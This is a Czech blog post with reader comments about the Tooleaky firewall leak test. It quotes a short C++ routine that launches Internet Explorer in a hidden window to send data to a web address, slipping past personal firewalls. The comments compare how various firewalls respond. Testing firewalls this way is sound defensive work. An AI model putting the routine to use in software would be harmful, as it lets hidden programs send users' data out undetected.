Narazil jsem dnes na takový pěkný malý prográmek, má 3 KB z webu tooleaky.zensoft.com, který krásně ukazuje, proč je Vaše firewall zcela k ničemu. Již dávno jsem psal o tom, že nejen antivirus je k ničemu, ale, že k ničemu je i samotná firewall, pokud není provázána se SandBoxem.
Zkuste si ten prográmek schválně stáhnout a spustit. Stažení i spuštění zabere 10 sekund. Pokud se Vám ukáže “success”, máte problém. Ten prográmek totiž využívá léta známé chyby řady Windows firewallů, a totiž, autorizace přístupu MSIE na internet (nutné třeba pro online Windows Update), a následné zneužití MSIE jinými programy. Stačí na to pár řádků kódu v C++:
bool TransmitAndReceiveData ( ) {
// Step 1: Find the MSIE
char buffer[MAX_PATH + 512];
long len = sizeof(buffer);
RegQueryValueA(
HKEY_LOCAL_MACHINE,
"SOFTWARE\\Classes\\Applications"+
"\\iexplore.exe\\shell\\open\\command",
buffer,
&len);
// Step 2: spawn IE in a hidden window
for ( char*c = &buffer[1]; *c != 0; c++ )
if ( *c == '%' ) *c = 0;
z_strcat(buffer, baseURL);
z_strcat(buffer, outputString);
WinExec(buffer, SW_HIDE);
// Step 3: wait for the page to load
int startCount = GetTickCount();
do {
EnumWindows(EnumWindowsProc, 0);
if ( (GetTickCount() - startCount) > 30000 )
return false;
} while ( ieWnd == NULL );
// Step 4: close the window
SendMessage(ieWnd, WM_SYSCOMMAND, SC_CLOSE, 0);
return true;
}
Takto jednoduše může libovolný virus zavolat MSIE, které je autorizováno přistupovat k internetu, a potom libovolně zasílat, co se mu zlíbí. Pěkné, ne? Pokud jste aspoň jednou navštívili s MSIE nějakou warez či porno stránku, spustili si P2P klienta, nebo nějaký “keygen”, jen tak stažený z webu, je docela dost dobře možné, že na počítači máte škůdce. A to škůdce, kterého Vaše firewall nikdy neodhalí, a nezachytí jej ani antivirus či spyware (ty se skutečně nesoustředí na nákazy získané z warez a porno odkazů)…
Microsoftí firewall toto vůbec neumí, Tiny Personal Firewall, mnou preferovaná, to umí, ZoneAlarm Pro to sice umí, ale má to defaultně vypnuté i ve verzi 5.1.
Mám firewall nastavenou tak, aby žádnej program nemohl pouštět Explorer, takže jsem teoreticky uspěl... Explorer pouštim jen v těch nejkrajnějších případech (optimalizace webu pro IE) 🙂 Cejtim se hned víc v bezpečí, i když mám windows...
Kerio Personal Firewall se zeptal, jestli chci onomu prográmku povolit spustit IE, což nepovoluji žádnému programu, takže by se nic nestalo.
S tím my Linuxáci problém nemáme. iptables lze jednoduše nastavit tak, že zakáže vše, co nepovolíte.
Tak jsem byl ja uspesny. Sygate Personal Firewall (velmi podobny Tiny) se zeptal, zda chci pustit IE na nejakou sitenu. Ja rekl, ze ne, a program se za chvili ozval, ze se nelze pripojit. Pokud jsem mu to povolil, ukazal Success. Protoze ale nema IE defautne povolen pristup na internet (pouzivam vyhradne Mozillu, vcetne mailklienta),tak ma po hehe. IE zapinam jen v krajnim pripade, kdyz je treba neco na nem otestovat (web-stranku), ci pokud dana stranka nejde v Mozille nacist.
PS: mě osobně toto v SuSE 9.1 naprosto nevzrušuje. Nemohu mít viry, protože nemám Windows.
A kde asi myslite ze vznikly historicky prvni viry? 😄 Pac pocitacovy viry jsou pojem starsi nez windows... (a tim nemyslim jen DOS... prvni program ktery se dal povazovat za virus byl napsany pod unixy...)
[4]
tady presne stejnej vysledek, kerio se me zeptal, jestli chci pustit IE... samozrejme za NECHCI 😉
PS: mě osobně toto v SuSE 9.1 naprosto nevzrušuje. Nemohu mít viry, protože nemám Windows.
treba http://www.root.cz/clanek/124 :_D
[7] a co jako? 😉 Ano, virus se dá napsat na jakýkoliv OS, ale poměr Unix versus Windows bude tak 1: 1 milión, zatímco poměr na trhu je trochu jinak..
[8] PS: mě osobně toto v SuSE 9.1 naprosto nevzrušuje. Nemohu mít viry, protože nemám Windows.
Pisete, ze nemate Windows a pritom v predchozim clanku zminujete koupi DOOMa III, na cem to tedy hrajete? 😉
[9] na Windows XP Pro.. nicméně, jako primární OS používám SuSE Linux 9.1
[9] No on totiž id svoje hry na linux vydává, já vím určitě že na něm funguje quake3 možná, že teda i doom.
[10] Tak to jo, uz jsem myslel, ze jste jeden z takovych tech zatvrzelych "Linux only" uzivatelu, co v kazdem druhem prispevku basni, ze jejich PC jeste Windows nezazilo a pritom nekde po vecerech pari Dooma III na XPckach. 🙂
Takze to vyzera tak, ze spominany programek nielenze otestuje firewall, ale vytvara na grc.com databazu, ktore pocitace z tych otestovanych tymto programom su napadnutelne.
Ktovie, kde ta databaza nakoniec skonci.
[13] grc.com je jedna z nejlepších sites na testování bezpečnosti PC, tam ke zneužití rozhodně nedojde... 3 místo ze 3.900.000 stránek na google.com ( http://www.google.com/search?q=firewall+test... )
[6] Taktéž. Kerio Personal Firewall se mne po spuštění prográmku dotáže, zda povolit připojení k grc.com. Cítím se chráněný, i když se mi můj firewall připomíná 🙂
Jak zapnu ochranu v Zone Alarmu? Diky za radu.
V Zone Alarmu jsem na karte program control vyhledal IE a v kolonce access jsem nastavil otaznik - firewall se bude ptat, jestli muze program pristupovat k inetu. Po spusteni Tooleaky se me sice firewall zeptal, ale aniz bych neco potvrdil, Tooleaky oznamil Success - tak nevim :-/
[5] Viry existují pro všechny systémy, to nikdo nepopírá. Ale za to, že je počítač nakažen virem, si může uživatel sám.
Samozřejmě, když budu tak blbý, že budu v Linuxu všechno dělat jako root, tak si hraju s ohněm. Když budu vše dělat jako uživatel, vir jaksi nemá příliš šancí se šířit.
Je to jen o tom, jak chce uživatel svůj systém používat, jak ho chce mít stabilní. Ve windows je kdeco s administrátorskými právy (a uživatelé třeba o tom ani neví) a spousta uživatelů má svého uživatele s administrátorskými právy, takže virům nic nebrání v jejich činnosti.
[17] to není ono, je to tam nazvené cosi jako "Open Process" a "Advanced Program Control"
dobrý tip, Radku!